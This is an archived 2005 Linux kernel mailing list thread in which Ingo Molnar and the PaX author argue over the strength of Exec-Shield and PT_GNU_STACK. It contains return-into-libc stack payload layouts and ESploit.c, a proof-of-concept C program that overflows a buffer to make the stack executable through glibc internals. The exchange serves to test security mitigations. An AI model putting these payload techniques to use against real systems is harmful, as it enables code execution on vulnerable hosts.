* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
@ 2005-02-02 16:51 Ingo Molnar
2005-02-02 22:08 ` pageexec
0 siblings, 1 reply; 26+ messages in thread
From: Ingo Molnar @ 2005-02-02 16:51 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o
* pageexec@freemail.hu <pageexec@freemail.hu> wrote:
> your concerns would be valid if this was impossible to achieve by an
> exploit, sadly, you'd be wrong too, it's possible to force an
> exploited application to call something like
> dl_make_stack_executable() and then execute the shellcode. [...]
and how do you force a program to call that function and then to execute
your shellcode? In other words: i challenge you to show a working
(simulated) exploit on Fedora (on the latest fc4 devel version, etc.)
that does that.
You can simulate the overflow itself so no need to find any real
application vulnerability, but show me _working code_ (or a convincing
description) that can call glibc's do_make_stack_executable() (or the
'many ways of doing this'), _and_ will end up executing your shell code
as well.
if you can do this i fully accept there's a problem.
Ingo
^ permalink raw reply [flat|nested] 26+ messages in thread

* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
From: pageexec @ 2005-02-02 22:08 UTC (permalink / raw)
To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

> and how do you force a program to call that function and then to execute
> your shellcode? In other words: i challenge you to show a working
> (simulated) exploit on Fedora (on the latest fc4 devel version, etc.)
> that does that.

i don't have any Fedora but i think i know roughly what you're doing,
if some of the stuff below doesn't work, let me know.

> You can simulate the overflow itself so no need to find any real
> application vulnerability, but show me _working code_ (or a convincing
> description) that can call glibc's do_make_stack_executable() (or the
> 'many ways of doing this'), _and_ will end up executing your shell code
> as well.

ok, since i get to make it up, here's the exploitable application then
the exploit method (just the payload, i hope it's obvious how it works).

------------------------------------------------------------------
int parse_something(char * field, char * user_input)
{
  ...
  strcpy(field, user_input+maybe_some_offset);
  ...
}
------------------------------------------------------------------
int some_function(char * user_input, ...)
{
  char field1[BUFLEN];
  ...
  parse_something(field1, user_input);
  ...
}
------------------------------------------------------------------

the stack just before the overflow looks like this:

[...]
[field1]
[other locals]
[saved EBP]
[saved EIP]
[user_input]
[...]

the overflow hits field1 and whatever is deemed necessary from that
point on.
i'll do this:

[...]
[field1 and other locals replaced with shellcode]
[saved EBP replaced with anything in this case]
[saved EIP replaced with address of dl_make_stack_executable()]
[user_input left in place, i.e., overflow ends before this]
[...]

dl_make_stack_executable() will nicely return into user_input (at which
time the stack has already become executable). as you can see, in this
particular case even a traditional strcpy() based overflow can get
around ascii-armor and FORTIFY_SOURCE.

if the overflow was of a different (more real-life, i'd say) nature,
then it could very well be based on memcpy(), which can copy 0 bytes
and has no problems with ascii armor, or on multiple overflows
triggered from the same function (think parse_something() getting
called in a parser loop) where you can compose more than one 0 byte on
the stack, or not be based on any particular C library function at all,
and then all bets are off as to what one can/cannot do.

if there's an address pointing back into the overflowed buffer
somewhere deeper in the stack then i could have a payload like:

[...]
[shellcode]
[saved EIP replaced with the address of a suitable 'retn' insn]
[more addresses of 'retn']
[address of dl_make_stack_executable()]
[pointer (in)to the overflowed buffer (shellcode)]
[...]

(this is actually the stack layout that a recent paper analysing ASLR
used/assumed [1]). note that this particular exploit method would be
greatly mitigated by a stack layout created by SSP [2] (meaning the
local variable reordering, not the canary stuff).

i could have also replaced the saved EBP (which becomes ESP eventually)
with a suitable address (not necessarily on the stack even) where i can
find (create) the [address of dl_make_stack_executable()] [shellcode
address] pattern (during earlier interactions with the exploited
application), but that requires whole application memory analysis
(which you can bet any exploit writer worth his salt would do).
speaking of ASLR/randomization, all that it means for the above is a
constant work factor (short of info leaking, of course); in the ES case
it's something like 12 bits, for PaX it's 15-16 bits (on i386).

[1] http://www.stanford.edu/~blp/papers/asrandom.pdf
[2] http://www.trl.ibm.com/projects/security/ssp/
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
From: Ingo Molnar @ 2005-02-03 9:44 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

* pageexec@freemail.hu <pageexec@freemail.hu> wrote:

> > You can simulate the overflow itself so no need to find any real
> > application vulnerability, but show me _working code_ (or a convincing
> > description) that can call glibc's do_make_stack_executable() (or the
> > 'many ways of doing this'), _and_ will end up executing your shell code
> > as well.
>
> the overflow hits field1 and whatever is deemed necessary from
> that point on. i'll do this:
>
> [...]
> [field1 and other locals replaced with shellcode]
> [saved EBP replaced with anything in this case]
> [saved EIP replaced with address of dl_make_stack_executable()]
> [user_input left in place, i.e., overflow ends before this]
> [...]
>
> dl_make_stack_executable() will nicely return into user_input
> (at which time the stack has already become executable).

wrong, _dl_make_stack_executable() will not return into user_input() in
your scenario, and your exploit will be aborted. Check the glibc sources
and the implementation of _dl_make_stack_executable() in particular.
I've also attached the disassembly of _dl_make_stack_executable(), from
glibc-2.3.4-3.i686.rpm.
The sources are at:

  http://download.fedora.redhat.com/pub/fedora/linux/core/development/SRPMS/glibc-2.3.4-3.src.rpm

	Ingo

0000ec50 <_dl_make_stack_executable>:
    ec50:  55                     push   %ebp
    ec51:  ba 0c 00 00 00         mov    $0xc,%edx
    ec56:  89 e5                  mov    %esp,%ebp
    ec58:  57                     push   %edi
    ec59:  56                     push   %esi
    ec5a:  53                     push   %ebx
    ec5b:  83 ec 10               sub    $0x10,%esp
    ec5e:  8b 08                  mov    (%eax),%ecx
    ec60:  e8 a6 34 00 00         call   1210b <__i686.get_pc_thunk.bx>
    ec65:  81 c3 6f 73 00 00      add    $0x736f,%ebx
    ec6b:  89 45 f0               mov    %eax,0xfffffff0(%ebp)
    ec6e:  8b bb d0 fc ff ff      mov    0xfffffcd0(%ebx),%edi
    ec74:  89 54 24 04            mov    %edx,0x4(%esp)
    ec78:  8b 45 04               mov    0x4(%ebp),%eax
    ec7b:  f7 df                  neg    %edi
    ec7d:  21 cf                  and    %ecx,%edi
    ec7f:  89 04 24               mov    %eax,(%esp)
    ec82:  ff 93 94 fe ff ff      call   *0xfffffe94(%ebx)
    ec88:  85 c0                  test   %eax,%eax
    ec8a:  0f 85 da 00 00 00      jne    ed6a <_dl_make_stack_executable+0x11a>
    ec90:  8b 45 f0               mov    0xfffffff0(%ebp),%eax
    ec93:  8b b3 34 ff ff ff      mov    0xffffff34(%ebx),%esi
    ec99:  39 30                  cmp    %esi,(%eax)
    ec9b:  0f 85 c9 00 00 00      jne    ed6a <_dl_make_stack_executable+0x11a>
    eca1:  80 bb d4 04 00 00 00   cmpb   $0x0,0x4d4(%ebx)
    eca8:  0f 84 82 00 00 00      je     ed30 <_dl_make_stack_executable+0xe0>
    ecae:  8b 83 d0 fc ff ff      mov    0xfffffcd0(%ebx),%eax
    ecb4:  8d 34 c5 00 00 00 00   lea    0x0(,%eax,8),%esi
    ecbb:  8d 3c 38               lea    (%eax,%edi,1),%edi
    ecbe:  89 f6                  mov    %esi,%esi
    ecc0:  29 f7                  sub    %esi,%edi
    ecc2:  8b 93 14 ff ff ff      mov    0xffffff14(%ebx),%edx
    ecc8:  81 e2 ff ff ff fe      and    $0xfeffffff,%edx
    ecce:  89 54 24 08            mov    %edx,0x8(%esp)
    ecd2:  89 74 24 04            mov    %esi,0x4(%esp)
    ecd6:  89 3c 24               mov    %edi,(%esp)
    ecd9:  e8 22 2a 00 00         call   11700 <__mprotect>
    ecde:  85 c0                  test   %eax,%eax
    ece0:  74 de                  je     ecc0 <_dl_make_stack_executable+0x70>
    ece2:  8b 83 08 05 00 00      mov    0x508(%ebx),%eax
    ece8:  83 f8 0c               cmp    $0xc,%eax
    eceb:  75 3b                  jne    ed28 <_dl_make_stack_executable+0xd8>
    eced:  39 b3 d0 fc ff ff      cmp    %esi,0xfffffcd0(%ebx)
    ecf3:  74 5b                  je     ed50 <_dl_make_stack_executable+0x100>
    ecf5:  89 f1                  mov    %esi,%ecx
    ecf7:  d1 e9                  shr    %ecx
    ecf9:  89 ce                  mov    %ecx,%esi
    ecfb:  01 cf                  add    %ecx,%edi
    ecfd:  8b 93 14 ff ff ff      mov    0xffffff14(%ebx),%edx
    ed03:  81 e2 ff ff ff fe      and    $0xfeffffff,%edx
    ed09:  89 54 24 08            mov    %edx,0x8(%esp)
    ed0d:  89 74 24 04            mov    %esi,0x4(%esp)
    ed11:  89 3c 24               mov    %edi,(%esp)
    ed14:  e8 e7 29 00 00         call   11700 <__mprotect>
    ed19:  85 c0                  test   %eax,%eax
    ed1b:  74 a3                  je     ecc0 <_dl_make_stack_executable+0x70>
    ed1d:  8b 83 08 05 00 00      mov    0x508(%ebx),%eax
    ed23:  83 f8 0c               cmp    $0xc,%eax
    ed26:  74 c5                  je     eced <_dl_make_stack_executable+0x9d>
    ed28:  83 c4 10               add    $0x10,%esp
    ed2b:  5b                     pop    %ebx
    ed2c:  5e                     pop    %esi
    ed2d:  5f                     pop    %edi
    ed2e:  5d                     pop    %ebp
    ed2f:  c3                     ret
    ed30:  8b 8b 14 ff ff ff      mov    0xffffff14(%ebx),%ecx
    ed36:  89 4c 24 08            mov    %ecx,0x8(%esp)
    ed3a:  8b 93 d0 fc ff ff      mov    0xfffffcd0(%ebx),%edx
    ed40:  89 3c 24               mov    %edi,(%esp)
    ed43:  89 54 24 04            mov    %edx,0x4(%esp)
    ed47:  e8 b4 29 00 00         call   11700 <__mprotect>
    ed4c:  85 c0                  test   %eax,%eax
    ed4e:  75 27                  jne    ed77 <_dl_make_stack_executable+0x127>
    ed50:  83 8b 34 04 00 00 01   orl    $0x1,0x434(%ebx)
    ed57:  31 c0                  xor    %eax,%eax
    ed59:  8b 7d f0               mov    0xfffffff0(%ebp),%edi
    ed5c:  c7 07 00 00 00 00      movl   $0x0,(%edi)
    ed62:  83 c4 10               add    $0x10,%esp
    ed65:  5b                     pop    %ebx
    ed66:  5e                     pop    %esi
    ed67:  5f                     pop    %edi
    ed68:  5d                     pop    %ebp
    ed69:  c3                     ret
    ed6a:  83 c4 10               add    $0x10,%esp
    ed6d:  b8 01 00 00 00         mov    $0x1,%eax
    ed72:  5b                     pop    %ebx
    ed73:  5e                     pop    %esi
    ed74:  5f                     pop    %edi
    ed75:  5d                     pop    %ebp
    ed76:  c3                     ret
    ed77:  8b 83 08 05 00 00      mov    0x508(%ebx),%eax
    ed7d:  83 f8 16               cmp    $0x16,%eax
    ed80:  75 a6                  jne    ed28 <_dl_make_stack_executable+0xd8>
    ed82:  c6 83 d4 04 00 00 01   movb   $0x1,0x4d4(%ebx)
    ed89:  e9 20 ff ff ff         jmp    ecae <_dl_make_stack_executable+0x5e>
    ed8e:  90                     nop
    ed8f:  90                     nop
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
From: pageexec @ 2005-02-03 14:20 UTC (permalink / raw)
To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

> > dl_make_stack_executable() will nicely return into user_input
> > (at which time the stack has already become executable).
>
> wrong, _dl_make_stack_executable() will not return into user_input() in
> your scenario, and your exploit will be aborted. Check the glibc sources
> and the implementation of _dl_make_stack_executable() in particular.

oh, you mean the invincible __check_caller(). one possibility:

[...]
[field1 and other locals replaced with shellcode]
[value of __libc_stack_end]
[some space for the local variables of dl_make_stack_executable and others]
[saved EBP replaced with anything in this case]
[saved EIP replaced with address of a 'pop eax'/'retn' sequence]
[address of [value of __libc_stack_end], loads into eax]
[address of dl_make_stack_executable()]
[address of a suitable 'retn' insn in ld.so/libpthread.so]
[user_input left in place, i.e., overflows end before this]
[...]

this payload needs two overflows to construct the two 0 bytes needed (a
memcpy based one would easily get away with one, of course) and an
extra condition in that, in order to load eax, we need to find an
addressable 2 byte sequence (in executable memory outside the ascii
armor, which may very well include some library/main executable
.data/.bss as well under Exec-Shield) that encodes pop eax/retn or
popad/retn (for the latter the stack has to be filled appropriately
with more data, of course). other sequences could do the job as well,
these two are just the trivial ones that come to mind and that i found
in some binaries i checked quickly (my sshd also has a pop eax/pop
ebx/pop esi/pop edi/pop ebp/retn sequence, for example, which is
suitable as well).
the question of whether you can get away with one overflow (strcpy() or
similar based) is open, i don't quite have the time to hunt down all
the nice insn sequences that can help loading registers with proper
content and executing dl_make_stack_executable() or a suitable part of
it. at least there's no explicit mechanism in this system that would
prevent it in a guaranteed way.
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
From: Ingo Molnar @ 2005-02-03 20:20 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

* pageexec@freemail.hu <pageexec@freemail.hu> wrote:

> > > dl_make_stack_executable() will nicely return into user_input
> > > (at which time the stack has already become executable).
> >
> > wrong, _dl_make_stack_executable() will not return into user_input() in
> > your scenario, and your exploit will be aborted. Check the glibc sources
> > and the implementation of _dl_make_stack_executable() in particular.
>
> oh, you mean the invincible __check_caller(). one possibility:
>
> [...]
> [field1 and other locals replaced with shellcode]
> [value of __libc_stack_end]
> [some space for the local variables of dl_make_stack_executable and others]
> [saved EBP replaced with anything in this case]
> [saved EIP replaced with address of a 'pop eax'/'retn' sequence]
> [address of [value of __libc_stack_end], loads into eax]
> [address of dl_make_stack_executable()]
> [address of a suitable 'retn' insn in ld.so/libpthread.so]
> [user_input left in place, i.e., overflows end before this]
> [...]

still wrong. What you get this way is a nice, complicated NOP.

	Ingo
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
From: pageexec @ 2005-02-07 14:23 UTC (permalink / raw)
To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

[-- Attachment #1: Mail message body --]
[-- Type: text/plain, Size: 2581 bytes --]

> still wrong. What you get this way is a nice, complicated NOP.

not only a nop but also a likely crash given that i didn't adjust the
declaration of some_function appropriately ;-). let's cater for less
complexity too with the following payload (of the 'many other ways'
kind):

[field1 and other locals replaced with shellcode]
[space to cover the locals of __libc_dlopen_mode()]
[fake EBX]
[fake ESI]
[fake EBP]
[address of field1 (shellcode)]
[address of user_input+x, ends with "libbeecrypt.so"]
[fake mode for __libc_dlopen_mode(), 0x01010101 will do]
[space for the local variables of __libc_dlopen_mode() and others]
[saved EBP replaced with address of [fake EBP]]
[saved EIP replaced with address of __libc_dlopen_mode()+3]
[user_input no longer used in the exploit]

user_input (the original, untouched buffer) ends with a suitable
library name (such as "libbeecrypt.so", see [1]). this string could
have also been left behind in the address space somewhere during
earlier interactions. we have to produce one 0 byte only, hence we're
back at the generic single overflow case. this also no longer relies on
the user_input argument being at a particular address on the stack, so
it's a generic method in that regard as well.

one disadvantage of this approach is that now not only the randomness
in libc.so has to be found but also that of the stack (repeating parts
of the payload would help reduce it though), and if user_input itself
is on the heap (and there're no copies on the stack), we'll need that
randomness too.
in any case, you got your exploit method against latest Fedora (see the
attachment [2]), this should prove that paxtest does the right thing
when it exposes the weaknesses of Exec-Shield. now, will you and Arjan
do the right thing and apologize to us or do you still maintain that
paxtest is a sabotage?

[1] https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=132149
    it also appears that not only the design and implementation of
    PT_GNU_STACK are broken but its deployment as well. not even its
    creators managed to get it right, what can we expect from
    unsuspecting distros? 5 months and still no resolution? does this
    backdoor really belong in linux?

[2] ESploit.c is a simple proof of concept self-exploiting test that
    will hang itself when successful. compiler optimizations and
    randomizations can introduce 0 bytes in some of the addresses used
    (check the shellcode length), play with them a bit to get it to
    run. stack usage in the (ab)used libc functions may also require
    adjusting the buffer sizes.

[-- Attachment #2: Attachment information. --]
[-- Type: text/plain, Size: 472 bytes --]

---- File information -----------
     File:  ESploit.c
     Date:  8 Feb 2005, 0:07
     Size:  1294 bytes.
     Type:  Program-source

[-- Attachment #3: ESploit.c --]
[-- Type: Application/Octet-stream, Size: 1294 bytes --]

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>

char buffer[8192];
void * handle, * mydlopen, * retaddr;
unsigned long eip, fakeebp, * tmp = (unsigned long*)buffer;

void overflow(char * field1, char * user_input)
{
    strcpy(field1, user_input);
}

int main()
{
    unsigned long shellcode[1024];

    handle = dlopen(NULL, RTLD_LAZY);
    if (!handle) {
        printf("dlopen error: %s\n", dlerror());
        return -1;
    }
    dlerror();
    mydlopen = dlsym(handle, "__libc_dlopen_mode");
    if (!dlerror) {
        printf("dlsym error\n");
        return -1;
    }
    printf("mydlopen: %p\n", mydlopen);
    retaddr = __builtin_return_address(0);
    printf("retaddr: %p\n", retaddr);
    for (eip = 0; eip < 16384; eip++)
        if (shellcode[eip] == (unsigned long)retaddr)
            break;
    if (16384 == eip) {
        printf("can't find saved EIP\n");
        return -1;
    }
    printf("saved EIP: %p at index %u\n", shellcode+eip, eip);
    memset(buffer, 0xFA, sizeof buffer);
    buffer[0] = 0xEB;
    buffer[1] = 0xFE;
    fakeebp = eip-1000;
    tmp[eip-1] = &shellcode[fakeebp];
    tmp[eip] = (char*)mydlopen+3;
    tmp[eip+1] = 0;
    tmp[fakeebp+1] = shellcode;
    tmp[fakeebp+2] = "libbeecrypt.so";
    tmp[fakeebp+3] = 0x01010101;
    printf("shellcode length: %x\n", strlen(buffer));
    overflow(shellcode, buffer);
    return 0;
}
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
From: Ingo Molnar @ 2005-02-07 21:08 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

* pageexec@freemail.hu <pageexec@freemail.hu> wrote:

> > still wrong. What you get this way is a nice, complicated NOP.
>
> not only a nop but also a likely crash given that i didn't adjust
> the declaration of some_function appropriately ;-). let's cater
> for less complexity too with the following payload (of the 'many
> other ways' kind):
>
> [field1 and other locals replaced with shellcode]
> [space to cover the locals of __libc_dlopen_mode()]

yes, i agree with you, __libc_dlopen_mode() is an easier target (but
not _that_ easy of a target, see further down), and your code looks
right - but what this discussion was about was the
_dl_make_stack_executable() function. Similar 'protection' techniques
can be used for __libc_dlopen_mode() too, and it's being fixed.

(you'd be correct to point out that what cannot be 'fixed' even this
way are libdl.so-using applications and the dlopen() symbol - for them,
if randomization is not enough, PaX or SELinux is the fix.)

> one disadvantage of this approach is that now not only the randomness
> in libc.so has to be found but also that of the stack (repeating parts
> of the payload would help reduce it though), and if user_input itself
> is on the heap (and there're no copies on the stack), we'll need that
> randomness too.

such an attack needs to get 2 or 3 random values right - which,
considering 13 bits of randomization per value, is still 26-39 bits
(minus the constant number of bits you can get away with via
replication). If the stack wasn't nonexec then the attack would need to
get only 1 random value right.
In that sense it still makes quite a difference in increasing the
complexity of the attack, do you agree?

Yes, the drastic method is to disable the adding of code to a process
image altogether (PaX did this first, and does a nice job of it, and
SELinux is catching up as well), but that clearly was not a product
option when PT_GNU_STACK was written. As you can see on lkml, people
resist hard even changes that affect 2-3 apps. What chances do changes
have that break dozens of common applications? PT_GNU_STACK is not
perfect, but it was the maximum we could get away with on the
non-selinux side of the distribution, mapping many of the dependencies
and assumptions of apps.

So PT_GNU_STACK is certainly a beginning, and as the end result
(hopefully soon) we can do away with libraries having any RWE
PT_GNU_STACK markings (so that only binaries can carry RWE) and can
move make_stacks_executable() out of libc.so. You seem to consider
these steps of how Fedora 'morphs' into a productized version of
SELinux as 'fully vulnerable' (and despise it), but there's no way
around walking that walk and persuading users to actually follow -
which is the hardest part.

	Ingo
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
From: pageexec @ 2005-02-08 12:27 UTC (permalink / raw)
To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

> yes, i agree with you, __libc_dlopen_mode() is an easier target (but not
> _that_ easy of a target, see further down), and your code looks right

actually, line 25 is crap (talk about 'coding while intoxicated' ;-),
it should be 'if (dlerror())' of course. also, you should really try to
run the code as it exposes a bug in your handling of PT_GNU_STACK and
RELRO and dlopen(); at least i ran into it on my system and a user
reported it under FC3 too (hint: '__stack_prot attribute_relro' is not
such a great idea).

> but what this discussion was about was the _dl_make_stack_executable()
> function.

the jury is still out on that one, i just don't have the time and beer
to do the full research that a real exploit writer would do. in
security, unless proven otherwise, we try to assume the worst case. and
given how there's no specific uncircumventable protection measure in
that function either, i wouldn't be surprised at all if it can be
directly exploited. second, __libc_dlopen_mode() *does* make use of
said function, albeit not directly, but it's still the work horse (and
the underlying (in)security problem), so to speak.

> Similar 'protection' techniques can be used for __libc_dlopen_mode()
> too, and it's being fixed.

if you mean __check_caller() and others, i have my doubts: if a symbol
can be looked up by dlsym() then you can't assume that no real life app
does so already (and would break if you enforced libc-only callers).
yes, you can argue that this symbol should not have been visible to
everyone to begin with, but it's now after the fact.
the bigger problem is however that you're once again fixing the
symptoms instead of the underlying problem - not the correct
approach/mindset. also consider that __check_caller() and the other
'security' techniques you put into Fedora are all trivially breakable
in a memcpy() or similar overflow (this whole exercise here was about
showing how even string based overflows can still be exploited).

> (you'd be correct to point out that what cannot be 'fixed' even this way
> are libdl.so using applications and the dlopen() symbol - for them, if
> randomization is not enough, PaX or SELinux is the fix.)

for example, apache links against libdl, so there are real life apps
out there affected by this technique. i don't see how SElinux enters
this picture though, it (and other access control mechanisms) serves a
different purpose: they don't stop exploits of memory corruption bugs,
they enforce least privilege (to whatever degree). the danger of
relying on access control under Exec-Shield is that once an attacker
can execute his own code on the target system (ESploit shows how), all
it takes is a single exploitable kernel bug and he's in for good. and
as the past months have shown, such bugs are not exactly unheard of in
linux land.

> such an attack needs to get 2 or 3 random values right - which,
> considering 13-bits randomization per value is still 26-39 bits (minus
> the constant number of bits you can get away via replication).

the maths doesn't quite work that way. what matters is not how many
random values you have to get right, but how much entropy you have to
get right. the difference is that if two random values share their
entropy (e.g., they have a constant difference, or are at least derived
from the same randomness - something an attacker can observe on a test
system) then that's only one randomness to guess, not two. in my
example exploit payload we have one random value from libc and a few on
the stack - the latter share the entropy.
this should also explain why PaX doesn't bother with individual library
randomization and why your recent submission into -mm is missing the
target (not to mention the implementation issues): it's just a waste of
entropy when an exploit doesn't need more than one library (and as
ESploit shows, it doesn't). i'd also add that all this number juggling
becomes worthless if information can be leaked from the attacked task.

so the maths under Exec-Shield would be 12+16 bits or so, if i'm not
mistaken. whether that actually means 12+16=28 or
log2(2^12+2^16) ~= 16 bits depends on whether an attacker has to learn
(guess) them together at once, or can learn them individually. the
paper i linked to in my first post in this thread shows a technique
that can find out the libc randomization without having to learn the
stack one. that technique is neither new nor the only one that can do
this. in your defense, i'd held this belief 3 years ago too (i.e., that
the randomness of different areas would have to be guessed at once) but
for some time now i've been much less sure that it's a useful generic
assumption.

> If the stack wasnt nonexec then the attack would need to get only
> 1 random value right. In that sense it still makes quite a difference
> in increasing the complexity of the attack, do you agree?

based on the above explanation of what i know, i don't agree *in
general*; it has to be rather a special case when one really has to
guess different randomizations at once (again, unless proven otherwise,
i'll assume the worst case).

on another note, increasing the complexity of exploits this way is not
a good idea if you want the slightest security guarantees for your
system. the problem is that without a crash monitoring/reaction
mechanism one can just happily keep trying and eventually get in - what
is the point then? in the PaX strategy the reason for using
randomization is that we can't do much (yet) against the two other
classes of exploit techniques, plus it's a cheap measure, so 'why not'.
but it's not a security measure in the sense that controlling runtime
code generation is. in other words, the security guarantee that PaX
gives doesn't rely on randomization, while you seem to be putting too
much faith into it when discussing the value provided by Exec-Shield.
even with crash monitoring/reaction one can only claim a 'probabilistic
guarantee', something that's not always good enough (it may be ok on a
client system where you protect say a web browser, but it's less useful
on servers because of service level constraints).

> Yes, the drastic method is to disable the adding of code to a process
> image altogether (PaX did this first, and does a nice job in that, and
> SELinux is catching up as well), but that clearly was not a product
> option when PT_GNU_STACK was written.

again, SElinux doesn't do memory protection per se, it has to be (and
is) a VM subsystem thing. what they did recently is rounding out the
memory protection facilities of the VM by adding access control for
executable mappings. we've done all this in grsecurity for something
like 4 years now, and in Hardened Gentoo we've had SElinux working with
PaX for a year; similar for RSBAC.

> As you can see on lkml, people are resisting changes hard that
> affect 2-3 apps. What chances do changes have that break dozens of
> common applications?

i don't see your dilemma. having the ability to control runtime code
generation (making it a privilege, instead of a given) is orthogonal to
its deployment strategy (that mostly comes down to 'default on' or
'default off'). i don't think the kernel should have the policy for the
latter, it's better left to users/distros. the kernel should however
provide the means to implement policies that restrict runtime code
generation. in my opinion anyway. as a distro, you can make it 'default
off' and you're set for backwards compatibility while giving users at
least the option to begin using the extra security measures.
then work on your distro to be able to enable the restrictions on more
and more apps, or to be able to run with 'default on' (and/or have a
'hardened' version that does the latter from the beginning). in the PaX
world we have Adamantix and Hardened Gentoo that run with 'default on'.
you also seem to have been following this strategy with SElinux, i
don't see why it wouldn't work with other security measures then.

now if you try the 'default on' approach then you'll actually break
apps. in my experience, they come in these flavours:

- apps that need to generate code at runtime but do so without asking
  for the right memory permissions, e.g., libjvm.so having code in
  .data. as Linus also said in another thread lately, they're broken
  and should be fixed. the problem is of course 3rd party/binary stuff
  that cannot be fixed just like that.

- apps that generate code at runtime but don't really need to. think of
  nested function trampolines, the XFree86 ELF loader, etc. these apps
  are arguably 'broken'; from my point of view they're carelessly
  written as they need more privileges than what is really necessary.
  for the past few years i've tried to help various projects eliminate
  these problems, but there's always more work to do...

- apps that by their nature want/need to generate code at runtime.
  think VMs/JIT engines, etc. they of course cannot be 'fixed' as they
  aren't broken per se. rather, they have to be allowed to generate
  code at runtime, and in as secure a way as possible.

to solve all these problems one needs at least a system that can grant
this privilege on a per app basis. the PaX solution is the PT_PAX_FLAGS
ELF program header and the access control system hooks. PT_GNU_STACK
doesn't solve these problems, i explained in your bugzilla why that is.
now imagine if i had added support for PT_GNU_STACK in PaX: i would
have opened up a true backdoor that every exploit writer with half a
brain could have abused to break PaX a la ESploit.
> PT_GNU_STACK is not perfect,

that's quite an understatement, Ingo. if you want my uncensored
opinion, it's utter crap. it would be nice if you guys actually
responded to my claims in your bugzilla instead of remaining silent or
trying to explain it away in generic terms as above. your work affects
the whole linux world and they deserve to know. and on a personal note,
it's getting really tiring to scan the latest 2.6.x for patches i have
to revert or work around in PaX.

> but it was the maximum we could get away on the non-selinux side of
> the distribution, mapping many of the dependencies and assumptions
> of apps.

you weren't even trying to solve the right problem, no wonder you came
up with something as broken as PT_GNU_STACK. the problem, once again,
for those not bothering to read your bugzilla, is not whether an app
wants an executable stack or not, it's about the privilege of runtime
code generation. it affects the stack just as much as it does the heap,
anon mappings, .data/.bss, whatever. now you can argue that this
ability should not be a privilege, then it's fine, we're just solving
completely different security issues (which is probably not the case,
as your work claims to protect against the same exploits that PaX
does).

> So PT_GNU_STACK is certainly a beginning, and as the end result
> (hopefully soon) we can do away with libraries having any RWE
> PT_GNU_STACK markings (so that only binaries can carry RWE) and can
> move make_stacks_executable() from libc.so.

i'd like to see how that will solve the problem when an app uses
dlopen() to open a library that uses nested function trampolines. i
hope you're not suggesting that you'll be able to rewrite the whole
world and get rid of such libraries (which, however noble a goal, is
impossible). and if it will take 5+ months for each such case, i see
only bad news for Fedora. once again, you believe that by trying to
handle the symptoms, the underlying disease will go away.
it won't, but for my part i'll stop contributing more exploit
techniques here, it apparently is a pointless exercise.

> You seem to consider these steps of how Fedora 'morphs' into a
> productized version of SELinux as 'fully vulnerable' (and despise it),

you again bring up SElinux, i can't fathom how it has anything to do
with what i said about Exec-Shield, PT_GNU_STACK and related issues. if
i have a problem then it's about your (you and your colleagues) whole
attitude and approach to security. read again this response you gave me
and tell me where you addressed a *single* technical issue i raised
here or in your bugzilla. see the problem? do you understand that
PT_GNU_STACK is broken by *design* (or rather, its lack thereof)? is
there no one among the PT_GNU_STACK creators who has anything to say
about my claims? all agree? or disagree? have you got any arguments we
can discuss?

> there's no way around walking that walk and persuading users to
> actually follow - which is the hardest part.

what's even harder is making you understand that what you are giving
your users and customers is false claims and a false sense of security.
and i still haven't heard from you guys on the paxtest 'sabotage'.

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
  2005-02-08 12:27             ` pageexec
@ 2005-02-08 21:23               ` Ingo Molnar
  0 siblings, 0 replies; 26+ messages in thread
From: Ingo Molnar @ 2005-02-08 21:23 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

* pageexec@freemail.hu <pageexec@freemail.hu> wrote:

> > but what this discussion was about was the _dl_make_stack_executable()
> > function.
>
> the jury is still out on that one, i just don't have the time and beer
> to do the full research that a real exploit writer would do. in
> security, unless proven otherwise, we try to assume the worst case.
> and given how there's no specific uncircumventable protection measure
> in that function either, i wouldn't be surprised at all if it can be
> directly exploited.

well. It's at least not as trivial as you made it sound ;-)

> second, __libc_dlopen_mode *does* make use of said function, albeit
> not directly, but it's still the work horse (and the underlying
> (in)security problem), so to speak.

that's correct.

> > Similar 'protection' techniques can be used for __libc_dlopen_mode()
> > too, and it's being fixed.
>
> if you mean __check_caller() and others, i have my doubts, if a symbol
> can be looked up by dlsym() then you can't assume that no real life
> app does it already (and would break if you enforced libc-only
> callers). yes, you can argue that this symbol should not have been
> visible to everyone to begin with, but it's now after the fact.

relying on internal glibc symbols has always been frowned upon. The
name can change anytime, the API can change. So no, this is not an
issue.

> the bigger problem is however that you're once again fixing the
> symptoms, instead of the underlying problem - not the correct
> approach/mindset.

my position is that there is _no_ 100% solution (given the
circumstances), hence it's all a probabilistic game and about balancing
between tradeoffs.
> > (you'd be correct to point out that what cannot be 'fixed' even this way
> > are libdl.so using applications and the dlopen() symbol - for them, if
> > randomization is not enough, PaX or SELinux is the fix.)
>
> for example apache links against libdl, so there are real life apps
> out there affected by this technique. [...]

yes. But not all hope is lost, there's a linker feature that avoids the
dlopen()ing of RWE DSOs. We've activated this and it will solve at
least the libbeecrypt-alike problems.

> [...] i don't see how SElinux enters this picture though, it (and
> other access control mechanisms) serve a different purpose, they don't
